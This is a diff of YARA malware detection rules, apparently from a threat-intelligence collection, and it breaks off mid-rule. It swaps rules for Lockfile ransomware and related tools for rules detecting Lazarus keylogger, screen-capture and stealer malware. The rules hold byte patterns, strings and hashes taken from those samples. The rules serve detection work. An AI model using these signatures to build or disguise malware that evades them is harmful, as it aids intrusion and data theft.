?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 7b ?? 00 00 04 28 ?? 00 00 0a 1f 16 63 21 00 b0 ca a2 4a 01 00 00 58 0d 09 28 ?? 00 00 0a 13 05 12 05 28 ?? 00 00 0a 13 04 02 12 04 fe 16 ?? 00 00 01 6f ?? 00 00 0a 7d ?? 00 00 04 2a } - $s3 = { 72 [2] 00 70 73 ?? 00 00 0a 0a 06 6f ?? 00 00 0a 6f ?? 00 00 0a 0c 2b 75 08 6f ?? 00 00 0a 74 ?? 00 00 01 0b 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 ?? 19 00 70 6f ?? 00 00 0a 2c 16 02 07 72 ?? 19 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 08 6f ?? 00 00 0a 2d 83 de 0a 08 2c 06 08 6f ?? 00 00 0a dc 2a } - $x1 = "---------------- mercurial grabber ----------------" fullword wide - $x2 = { 5c 00 73 00 2a 00 3a 00 5c 00 73 00 2a 00 28 00 22 00 28 00 3f 00 3a 00 5c 00 5c 00 22 00 7c 00 5b 00 5e 00 22 00 5d 00 29 00 2a 00 3f } - $x3 = { 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 34 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 36 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 37 00 7d 00 01 1d 6d 00 66 00 61 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 38 00 34 00 7d } + $seq1 = { 41 57 41 56 41 55 41 54 41 89 f5 55 53 49 89 fc 48 83 ec 58 64 48 8b 04 25 28 00 00 00 48 89 44 24 48 31 c0 e8 77 60 ff ff 89 c7 e8 20 60 ff ff 48 8b 58 20 c6 44 24 10 85 48 8d 7c 24 10 c6 44 24 11 2d c6 44 24 12 c5 ba 22 00 00 00 c6 44 24 13 7a c6 44 24 14 02 be 30 00 00 00 c6 44 24 15 58 c6 44 24 16 30 c6 44 24 17 e4 c6 44 24 18 8a c6 44 24 19 37 c6 44 24 1a bd c6 44 24 1b 68 c6 44 24 1c f6 c6 44 24 1d f8 c6 44 24 1e 6c c6 44 24 1f 8c c6 44 24 20 97 c6 44 24 21 cb c6 44 24 22 73 c6 44 24 23 bd c6 44 24 24 7b c6 44 24 25 19 c6 44 24 26 93 c6 44 24 27 a0 c6 44 24 28 26 c6 44 24 29 26 c6 44 24 2a ae c6 44 24 2b 1c c6 44 24 2c 96 c6 44 24 2d 1d c6 44 24 2e 0f c6 44 24 2f be 44 8b 05 b6 7c 21 00 48 8b 0d b7 7c 21 00 c6 44 24 30 b2 c6 44 24 31 7d c6 44 24 32 48 c6 44 24 33 b9 c6 44 24 34 b6 c6 44 24 35 a4 c6 44 24 36 30 c6 44 24 37 43 c6 44 24 38 06 c6 44 24 39 e3 c6 44 24 3a 4f c6 44 24 3b 06 c6 44 24 3c f5 c6 44 24 3d 87 c6 44 24 3e d5 c6 44 24 3f 6a e8 3a 71 ff ff 48 89 df 48 89 c6 48 89 c5 e8 bc 6c ff ff 45 85 ed 48 89 c3 0f 85 a0 00 00 00 48 89 df e8 58 6e ff ff 85 c0 0f 84 30 01 00 00 8b 05 2a 7c 21 00 48 c7 44 24 08 00 00 00 00 48 83 ec 08 c7 44 24 0c 00 00 00 00 4c 8b 0d 16 7c 21 00 ba 2a 00 00 00 4c 89 e6 bf 01 00 00 00 50 4c 8d 44 24 14 48 8d 4c 24 18 e8 b1 71 ff ff 85 c0 5a } + $seq2 = { 41 54 41 b8 08 00 00 00 55 53 b9 00 f3 61 00 ba 42 00 00 00 49 89 fd 49 89 f4 48 83 ec 68 be 50 00 00 00 48 89 e7 c6 04 24 bf c6 44 24 01 cf 64 48 8b 04 25 28 00 00 00 48 89 44 24 58 31 c0 c6 44 24 02 c6 c6 44 24 03 a1 c6 44 24 04 20 c6 44 24 05 76 c6 44 24 06 5d c6 44 24 07 e5 c6 44 24 08 ec c6 44 24 09 87 c6 44 24 0a 45 c6 44 24 0b 26 c6 44 24 0c e1 c6 44 24 0d c8 c6 44 24 0e 8e c6 44 24 0f c0 c6 44 24 10 89 c6 44 24 11 d2 c6 44 24 12 ac c6 44 24 13 c1 c6 44 24 14 01 c6 44 24 15 08 c6 44 24 16 ac c6 44 24 17 8e c6 44 24 18 52 c6 44 24 19 65 c6 44 24 1a c9 c6 44 24 1b 06 c6 44 24 1c be c6 44 24 1d 82 c6 44 24 1e ef c6 44 24 1f 85 c6 44 24 20 9f c6 44 24 21 96 c6 44 24 22 fa c6 44 24 23 65 c6 44 24 24 50 c6 44 24 25 dd c6 44 24 26 0e c6 44 24 27 e0 c6 44 24 28 87 c6 44 24 29 ba c6 44 24 2a 27 c6 44 24 2b f8 c6 44 24 2c ef c6 44 24 2d 5c c6 44 24 2e 60 c6 44 24 2f 07 c6 44 24 30 b1 c6 44 24 31 c5 c6 44 24 32 3d c6 44 24 33 81 c6 44 24 34 df c6 44 24 35 87 c6 44 24 36 64 c6 44 24 37 01 c6 44 24 38 04 c6 44 24 39 9b c6 44 24 3a f9 c6 44 24 3b da c6 44 24 3c 28 c6 44 24 3d f1 c6 44 24 3e 30 c6 44 24 3f cb c6 44 24 40 c8 c6 44 24 41 48 c6 44 24 42 43 c6 44 24 43 e6 c6 44 24 44 e5 c6 44 24 45 f3 c6 44 24 46 c9 c6 44 24 47 8b c6 44 24 48 3c c6 44 24 49 a7 c6 44 24 4a 8b c6 44 24 4b 48 c6 44 24 4c 54 c6 44 24 4d 13 c6 44 24 4e 2b c6 44 24 4f bb e8 a4 aa ff ff bf 00 04 00 00 48 89 c5 e8 77 9a ff ff be 00 04 00 00 48 89 c3 48 89 c7 e8 37 9b ff ff 4c 89 ea 48 } + $seq3 = { 48 8d 7c 24 10 c6 44 24 10 fb c6 44 24 11 d0 64 48 8b 04 25 28 00 00 00 48 89 84 24 08 01 00 00 31 c0 c6 44 24 12 8d c6 44 24 13 ac c6 44 24 14 db c6 44 24 15 79 c6 44 24 16 84 c6 44 24 17 52 c6 44 24 18 44 c6 44 24 19 46 c6 44 24 1a 6c c6 44 24 1b d1 c6 44 24 1c ac c6 44 24 1d 31 c6 44 24 1e ca c6 44 24 1f 18 c6 44 24 20 18 c6 44 24 21 90 c6 44 24 22 ec c6 44 24 23 8f c6 44 24 24 a1 c6 44 24 25 74 c6 44 24 26 a8 c6 44 24 27 9a c6 44 24 28 53 c6 44 24 29 d4 c6 44 24 2a a4 c6 44 24 2b 5b c6 44 24 2c 68 c6 44 24 2d c8 c6 44 24 2e dd c6 44 24 2f a5 e8 18 a9 ff ff 48 89 c7 49 89 c5 e8 4d a6 ff ff 83 f8 01 74 40 31 db 4d 85 ed 74 08 4c 89 ef e8 b9 95 ff ff 48 8b 8c 24 08 01 00 00 64 48 33 } + $seq4 = { ba 15 00 00 00 be 20 00 00 00 c6 44 24 30 b1 c6 44 24 31 be c6 44 24 32 54 c6 44 24 33 93 c6 44 24 34 29 c6 44 24 35 67 c6 44 24 36 1f c6 44 24 37 b5 c6 44 24 38 a5 c6 44 24 39 ec c6 44 24 3a 18 c6 44 24 3b 53 c6 44 24 3c f0 c6 44 24 3d f1 c6 44 24 3e fe c6 44 24 3f 9f c6 44 24 40 27 c6 44 24 41 8f c6 44 24 42 8d c6 44 24 43 77 c6 44 24 44 1e c6 44 24 45 e1 c6 44 24 46 e1 c6 44 24 47 f0 c6 44 24 48 9e c6 44 24 49 e2 c6 44 24 4a 0d c6 44 24 4b 96 c6 44 24 4c ff c6 44 24 4d 6c c6 44 24 4e b4 c6 44 24 4f 16 e8 09 a8 ff ff 4c 89 ef 48 89 c6 49 89 c4 e8 8b a3 ff ff 48 8d bc 24 90 00 00 00 41 b8 08 00 00 00 b9 00 f3 61 00 ba 69 00 00 00 be 70 00 00 00 48 89 04 24 c6 84 24 90 00 00 00 b3 c6 84 24 91 00 00 00 0b c6 84 24 92 00 00 00 18 c6 84 24 93 00 00 00 fd c6 84 24 94 00 00 00 71 c6 84 24 95 00 00 00 3b c6 84 24 96 00 00 00 b7 c6 84 24 97 00 00 00 fc c6 84 24 98 00 00 00 70 c6 84 24 99 00 00 00 18 c6 84 24 9a 00 00 00 f7 c6 84 24 9b 00 00 00 22 c6 84 24 9c 00 00 00 2d c6 84 24 9d 00 00 00 75 c6 84 24 9e 00 00 00 5d c6 84 24 9f 00 00 00 8f c6 84 24 a0 00 00 00 75 c6 84 24 a1 00 00 00 60 c6 84 24 a2 00 00 00 91 c6 84 24 a3 00 00 00 b3 c6 84 24 a4 00 00 00 1a c6 84 24 a5 00 00 00 0b c6 84 24 a6 00 00 00 00 c6 84 24 a7 00 00 00 5c c6 84 24 a8 00 00 00 6b c6 84 24 a9 00 00 00 8d c6 84 24 aa 00 00 00 ee c6 84 24 ab 00 00 00 3b c6 84 24 ac 00 00 00 7e c6 84 24 ad 00 00 00 67 c6 84 24 ae 00 00 00 72 c6 84 24 af 00 00 00 43 c6 84 24 b0 00 00 00 f6 c6 84 24 b1 00 00 00 14 c6 84 24 b2 00 00 00 32 c6 84 24 b3 00 00 00 c1 c6 84 24 b4 00 00 00 79 c6 84 24 b5 00 00 00 0d c6 84 24 b6 00 00 00 0d c6 84 24 b7 00 00 00 22 c6 84 24 b8 00 00 00 e1 c6 84 24 b9 00 00 00 bd c6 84 24 ba 00 00 00 3f c6 84 24 bb 00 00 00 82 c6 84 24 bc 00 00 00 dd c6 84 24 bd 00 00 00 23 c6 84 24 be 00 00 00 7d c6 84 24 bf 00 00 00 87 c6 84 24 c0 00 00 00 34 c6 84 24 c1 00 00 00 9d c6 84 24 c2 00 00 00 43 c6 84 24 c3 00 00 00 98 c6 84 24 c4 00 00 00 da c6 84 24 c5 00 00 00 e0 c6 84 24 c6 00 00 00 3d c6 84 24 c7 00 00 00 64 c6 84 24 c8 00 00 00 1a c6 84 24 c9 00 00 00 d7 c6 84 24 ca 00 00 00 f5 c6 84 24 cb 00 00 00 5a c6 84 24 cc 00 00 00 c3 c6 84 24 cd 00 00 00 9c c6 84 24 ce 00 00 00 97 c6 84 24 cf 00 00 00 c7 c6 84 24 d0 00 00 00 65 c6 84 24 d1 00 00 00 8f c6 84 24 d2 00 00 00 99 c6 84 24 d3 00 00 00 eb c6 84 24 d4 00 00 00 2f c6 84 24 d5 00 00 00 2b c6 84 24 d6 00 00 00 d0 c6 84 24 d7 00 00 00 d9 c6 84 24 d8 00 00 00 4e c6 84 24 d9 00 00 00 8f c6 84 24 da 00 00 00 7b c6 84 24 db 00 00 00 97 c6 84 24 dc 00 00 00 3b c6 84 24 dd 00 00 00 14 c6 84 24 de 00 00 00 e9 c6 84 24 df 00 00 00 e9 c6 84 24 e0 00 00 00 82 c6 84 24 e1 00 00 00 48 c6 84 24 e2 00 00 00 dc c6 84 24 e3 00 00 00 a3 c6 84 24 e4 00 00 00 75 c6 84 24 e5 00 00 00 ca c6 84 24 e6 00 00 00 e6 c6 84 24 e7 00 00 00 40 c6 84 24 e8 00 00 00 6b c6 84 24 e9 00 00 00 b1 c6 84 24 ea 00 00 00 68 c6 84 24 eb 00 00 00 42 c6 84 24 ec 00 00 00 56 c6 84 24 ed 00 00 00 b4 c6 84 24 ee 00 00 00 ac c6 84 24 ef 00 00 00 2a c6 84 24 f0 00 00 00 fc c6 84 24 f1 00 00 00 34 c6 84 24 f2 00 00 00 fa c6 84 24 f3 00 00 00 1d c6 84 24 f4 00 00 00 1b c6 84 24 f5 00 00 00 9a c6 84 24 f6 00 00 00 62 c6 84 24 f7 00 00 00 b3 c6 84 24 f8 00 00 00 39 c6 84 24 f9 00 00 00 6a c6 84 24 fa 00 00 00 19 c6 84 24 fb 00 00 00 1b c6 84 24 fc 00 00 00 f3 c6 84 24 fd 00 00 00 c5 c6 84 24 fe 00 00 00 d2 c6 84 24 ff 00 00 00 6a e8 55 a4 ff ff 48 89 c7 48 89 c5 e8 4a 92 ff ff 44 8d 7c 03 0a 4d 63 ff 4c 89 ff e8 1a 94 ff ff 4c 89 fe 48 89 c3 48 89 c7 e8 dc 94 ff ff 4c 89 f2 48 89 ee 48 89 df 31 c0 e8 2c 95 ff ff 48 89 da 8b 0a 48 83 c2 04 8d 81 ff fe fe fe f7 d1 21 c8 25 80 80 80 80 74 e9 89 c1 4c 8b 3c 24 48 89 de c1 e9 10 a9 80 80 00 00 0f 44 c1 48 8d 4a 02 4c 89 ff 48 0f 44 d1 89 c1 00 c1 48 83 da 03 48 29 da e8 93 a8 ff ff 4c 89 ff be ed 01 00 00 4c 89 3c 24 e8 d2 aa ff ff 48 8d 44 24 50 41 b8 08 00 00 00 b9 00 f3 61 00 ba 34 00 00 00 be 40 00 00 00 c6 44 24 50 c6 48 89 c7 c6 44 24 51 3b c6 44 24 52 16 c6 44 24 53 01 c6 44 24 54 92 c6 44 24 55 36 c6 44 24 56 81 c6 44 24 57 c8 c6 44 24 58 f3 c6 44 24 59 49 c6 44 24 5a a8 c6 44 24 5b 02 c6 44 24 5c 6f c6 44 24 5d 9d c6 44 24 5e db c6 44 24 5f 61 c6 44 24 60 8a c6 44 24 61 e3 c6 44 24 62 f4 c6 44 24 63 1b c6 44 24 64 33 c6 44 24 65 4d c6 44 24 66 b4 c6 44 24 67 00 c6 44 24 68 f4 c6 44 24 69 76 c6 44 24 6a 70 c6 44 24 6b 56 c6 44 24 6c e2 c6 44 24 6d f3 c6 44 24 6e 5c c6 44 24 6f 73 c6 44 24 70 06 c6 44 24 71 de c6 44 24 72 c5 c6 44 24 73 fa c6 44 24 74 4c c6 44 24 75 7b c6 44 24 76 34 c6 44 24 77 b9 c6 44 24 78 d3 c6 44 24 79 a6 c6 44 24 7a 9b c6 44 24 7b 03 c6 44 24 7c f7 c6 44 24 7d 8e c6 44 24 7e 37 c6 44 24 7f 6a c6 84 24 80 00 00 00 3a c6 84 24 81 00 00 00 97 c6 84 24 82 00 00 00 57 c6 84 24 83 00 00 00 25 c6 84 24 84 00 00 00 2c c6 84 24 85 00 00 00 ac c6 84 24 86 00 00 00 a6 c6 84 24 87 00 00 00 de c6 84 24 88 00 00 00 29 c6 84 24 89 00 00 00 ca c6 84 24 8a 00 00 00 c0 c6 84 24 8b 00 00 00 93 c6 84 24 8c 00 00 00 67 c6 84 24 8d 00 00 00 47 c6 84 24 8e 00 00 00 8d c6 84 24 8f 00 00 00 } condition: - uint16(0)==0x5a4d and filesize >20KB and 2 of ($x*) and 2 of ($s*) + uint32(0)==0x464c457f and filesize >10KB and 3 of ($seq*) } -rule ARKBIRD_SOLG_RAN_Lockfile_Packed_Aug_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Screencapture_June_2020_1 : FILE { meta: - description = "Detect lockfile ransomware (Packed version)" - author = "Arkbird_SOLG" - id = "7c1631d0-5bec-5b44-b4b2-5ddf1dbd7222" - date = "2021-08-28" - modified = "2021-08-29" - reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Packed_Aug_2021_1.yara#L1-L18" + description = "Detect ScreenCapture malware used by Lazarus APT" + author = "Arkbird_SOLG, James_inthe_box" + id = "bb0463ac-6219-5a12-b3d2-fc82800bda69" + date = "2020-06-23" + modified = "2021-07-13" + reference = "https://twitter.com/GR_CTI/status/1275164880992186371" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L3-L31" license_url = "N/A" - logic_hash = "a52b2715d505a657c3cd7cd31efb47c16a0ec943a4e1b742bd3ec5c6e46495c9" - score = 50 + logic_hash = "66f8d3da0f70f6c4ed6f853ab4040d7f96c043e9e194f1720999b48910b3e756" + score = 75 quality = 75 tags = "FILE" - hash1 = "2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a" - hash2 = "bf315c9c064b887ee3276e1342d43637d8c0e067260946db45942f39b970d7ce" - level = "Experimental" - adversary = "Lockfile" + hash1 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8" strings: - $s1 = { 90 03 ?? 40 58 4a bc 3c 64 e4 5d 2e 44 45 45 45 ?? 72 48 8e 45 45 43 45 [6] 08 f6 33 45 [5] 01 e9 e3 } - $s2 = { 5b 22 48 0f 5b 22 48 0f 5b 22 48 bb c7 d3 48 03 5b 22 48 bb c7 d1 48 97 5b 22 48 bb c7 d0 48 16 5b 22 48 69 34 df 48 0e 5b 22 48 5d 2e 26 49 1d 5b 22 48 5d 2e 21 49 05 5b 22 48 59 2e 27 49 28 5b 22 48 59 2e 21 49 0e 5b 22 48 5d 2e 27 49 58 5b 22 48 06 23 b1 48 02 5b 22 48 0f 5b 23 48 bf 5b 22 48 59 2e 2b 49 0d 5b 22 48 59 2e dd 48 0e 5b 22 48 59 2e 20 49 0e 5b 22 48 52 69 63 68 0f 5b 22 48 } - $s3 = { 44 fc 90 a9 [0-4] 1c 79 38 10 [0-4] 18 20 72 0e [2-5] 3f [0-4] 24 34 6c 05 fc [0-4] 23 40 } - $s4 = { c3 df [0-4] 10 4c c8 20 d3 55 56 57 41 54 41 55 } + $s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\ScreenCapture_Win32_DllRelease.pdb" fullword ascii + $s2 = "CloseHandle ScreenCaptureMutex failure! %d" fullword ascii + $s3 = "ScreenCapture_Win32_DllRelease.dll" fullword ascii + $s4 = "ScreenCaptureMutex already created! %s\n" fullword ascii + $s5 = "Capturing screen...\n" fullword ascii + $s6 = "%s\\P%02d%lu.tmp" fullword ascii + $s7 = "ScreenCaptureThread finished!" fullword ascii + $s8 = "ScreenCaptureThread started!" fullword ascii + $s9 = "ScreenCapture start time set to %llu" fullword ascii + $s10 = "ScreenCaptureMutex already created! %s\n" fullword ascii + $s11 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii + $s12 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii + $s13 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii + $s14 = "[END] ScreenCaptureThread terminated!" fullword ascii + $s15 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 } + $s16 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 } + $s17 = "Entered Windows direcotry, skipping..." fullword ascii + $s18 = "Found %d entries." fullword ascii condition: - uint16(0)==0x5a4d and filesize >10KB and all of ($s*) + uint16(0)==0x5a4d and filesize <80KB and 14 of them } -rule ARKBIRD_SOLG_RAN_Lockfile_Aug_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Keylog_June_2020_1 : FILE { meta: - description = "Detect Lockfile ransomware (unpacked version)" - author = "Arkbird_SOLG" - id = "4abe2e70-5df9-5c5c-ac11-0c958d5430b7" - date = "2021-08-28" - modified = "2021-08-29" - reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Aug_2021_1.yara#L1-L19" + description = "Detect keylog malware used by Lazarus APT" + author = "Arkbird_SOLG, James_inthe_box" + id = "dd6aae8c-76d1-514d-905e-21472eb9b9b2" + date = "2020-06-23" + modified = "2021-07-13" + reference = "https://twitter.com/GR_CTI/status/1275164880992186371" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L33-L58" license_url = "N/A" - logic_hash = "6fc04316b8b4790494a8c88c8435245a051b2757e5936a5ef95cae2f05907b63" - score = 50 + logic_hash = "9a4e17903ad2a7c80651aa8f3d57876d1621be06ba7a683135b11929b232b2fa" + score = 75 quality = 75 tags = "FILE" - hash1 = "3303a19789a73fa70a107f8e35a4ce10bb4f6a69ac041a1947481ed8ae99a11c" - level = "experimental" - adversary = "Lockfile" + hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2" strings: - $s1 = { 80 32 41 48 8d 52 01 ff c1 81 f9 d1 57 00 00 72 ef 4c 8d 05 78 d4 06 00 33 d2 33 c9 ff 15 06 9a 05 00 48 8b d8 ff 15 0d 9a 05 00 48 8b cb 3d b7 00 00 00 75 14 ff 15 0d 9a 05 00 33 c0 48 81 c4 d0 03 00 00 41 5c 5b 5d c3 4c 89 b4 24 c8 03 00 00 4c 89 bc 24 c0 03 00 00 ff 15 e9 99 05 00 ff } - $s2 = "winsta0\\default" fullword ascii - $s3 = { 55 56 57 48 8d 6c 24 f0 48 81 ec 10 01 00 00 33 db 48 8b f1 48 89 5c 24 68 48 89 5d 40 48 89 5c 24 60 ff 15 0b a2 05 00 8b c8 89 45 38 48 8d 54 24 68 ff 15 1b a5 05 00 0f 57 c0 8d 7b 30 33 c0 48 89 45 00 48 89 45 98 48 8d 05 d4 db 06 00 0f 11 45 a0 c7 45 a0 68 00 00 00 0f 11 45 b0 48 89 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 0f 11 45 f0 0f 11 45 88 ff 15 17 a2 05 00 4c 8d 44 24 60 ba eb 01 02 00 48 8b c8 ff 15 4c a1 05 00 85 c0 0f 84 10 01 00 00 4c 8d 44 24 70 33 c9 48 8d 15 8e db 06 00 ff 15 28 a1 05 00 85 c0 0f 84 f4 00 00 00 48 8b 44 24 70 44 8d 4b 01 48 8b 4c 24 60 45 33 c0 48 89 44 24 7c ba 00 00 00 02 48 8d 45 40 c7 44 24 78 01 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 c7 45 84 02 00 00 00 ff 15 ef a0 05 00 85 } - $s4 = { 48 8d 85 18 03 00 00 40 88 74 24 53 48 89 44 24 30 4c 8d 4c 24 44 48 8b 05 57 04 0c 00 48 8d 15 f0 dd 06 00 48 89 44 24 28 48 8d 8d d0 01 00 00 48 8d 45 b0 4c 8b c3 48 89 44 24 20 e8 13 f3 ff ff 48 89 74 24 30 48 8d 8d d0 01 00 00 c7 44 24 28 80 00 00 00 45 33 c9 45 33 c0 c7 44 24 20 02 00 00 00 ba 00 00 00 c0 ff 15 a6 a3 05 00 44 8b 05 8f fe 07 00 48 8d 4d 88 48 8b f8 e8 23 b5 ff ff 48 83 } - $s5 = { 3c 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 25 73 3c 2f 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 00 3c 62 6c 6f 63 6b 6e 75 6d 3e 25 64 3c 2f 62 6c 6f 63 6b 6e 75 6d 3e 00 25 73 5c 25 73 2d 25 73 2d 25 64 25 73 } - $s6 = { 33 d2 48 8d 8d c0 00 00 00 41 b8 04 01 00 00 e8 48 99 03 00 48 8d 95 10 03 00 00 c7 85 10 03 00 00 04 01 00 00 48 8d 4d b0 ff 15 c5 a5 05 00 4c 8d 45 b0 48 8d 15 2a df 06 00 48 8d 8d c0 00 00 00 e8 96 f4 ff ff 44 8d 46 02 48 8d 15 33 df 06 00 48 8d 4c 24 68 e8 81 f4 ff ff c6 85 18 03 00 00 2f 8b ce c6 85 19 03 00 00 69 c6 85 1a 03 00 00 75 c6 85 1b 03 00 00 62 40 88 b5 1c 03 00 00 0f b6 } + $s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\KeyLog_Win32_DllRelease.pdb" fullword ascii + $s2 = "CloseHandle KeyLogMutex failure! %d" fullword ascii + $s3 = "KeyLog_Win32_DllRelease.dll" fullword ascii + $s4 = "Key Log Mutex already created! %s\n" fullword ascii + $s5 = "Unable to GetProcAddress of GetAsyncKeyState" fullword ascii + $s6 = "KeyLogThread finished!" fullword ascii + $s7 = "KeyLogThread started!" fullword ascii + $s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii + $s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii + $s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii + $s11 = "[END] KeyLogThread terminated!" fullword ascii + $s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 } + $s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 } + $s14 = "Entered Windows direcotry, skipping..." fullword ascii + $s15 = "Found %d entries." fullword ascii condition: - uint16(0)==0x5a4d and filesize >10KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize <80KB and 11 of them } -rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_2 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Generic_June_2020_1 : FILE { meta: - description = "Detect EFSPotatoe tool (Generic rule)" - author = "Arkbird_SOLG" - id = "f40673da-7b16-5657-ba9a-f3f13034ad12" - date = "2021-08-27" - modified = "2021-08-29" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_2.yara#L1-L20" + description = "Detect stealers used by Lazarus APT by common strings" + author = "Arkbird_SOLG, James_inthe_box" + id = "11a7c531-91a4-524e-aa5d-c11538f7db58" + date = "2020-06-23" + modified = "2021-07-13" + reference = "https://twitter.com/GR_CTI/status/1275164880992186371" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L60-L85" license_url = "N/A" - logic_hash = "eedad68d3192908fea2109c7fa51a2e38e31ed666424307318ac2123b95d1cd3" + logic_hash = "878e4a128b7de45f4940e7adccfeb376ce46e87b35b25e162f668303e9fd7852" score = 75 quality = 75 tags = "FILE" - hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050" - hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818" - hash3 = "47b85abee8a07e79ad95f48a3e3addf7235144b67b0350e2f9ac80e66f97e583" - hash4 = "7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd" - adversary = "-" + hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2" + hash2 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8" strings: - $s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 } - $s2 = "ncacn_np" fullword wide - $s3 = { 5c 00 5c 00 25 00 73 00 5c 00 [1-20] 00 5c 00 [1-20] 00 } - $s4 = { 63 00 36 00 38 00 31 00 64 00 34 00 38 00 38 00 2d 00 64 00 38 00 35 00 30 00 2d 00 31 00 31 00 64 00 30 00 2d 00 38 00 63 00 35 00 32 00 2d 00 30 00 30 00 63 00 30 00 34 00 66 00 64 00 39 00 30 00 66 00 37 00 65 } - $s5 = { 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 } + $s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease" fullword ascii + $s2 = "Mutex failure! %d" fullword ascii + $s3 = "Win32_DllRelease.dll" fullword ascii + $s4 = "Mutex already created! %s\n" fullword ascii + $s5 = "[END]" fullword ascii + $s6 = "Thread finished!" fullword ascii + $s7 = "Thread started!" fullword ascii + $s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii + $s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii + $s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii + $s11 = "Thread terminated!" fullword ascii + $s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 } + $s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 } + $s14 = "Entered Windows direcotry, skipping..." fullword ascii condition: - uint16(0)==0x5a4d and filesize >10KB and 4 of ($s*) + uint16(0)==0x5a4d and filesize <80KB and 11 of them } -rule ARKBIRD_SOLG_MAL_Kernel_Driver_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Babuklockers_Jan_2021_1 : FILE { meta: - description = "Detect kernel driver used by lockfile group" + description = "Detect the BabukLocker ransomware" author = 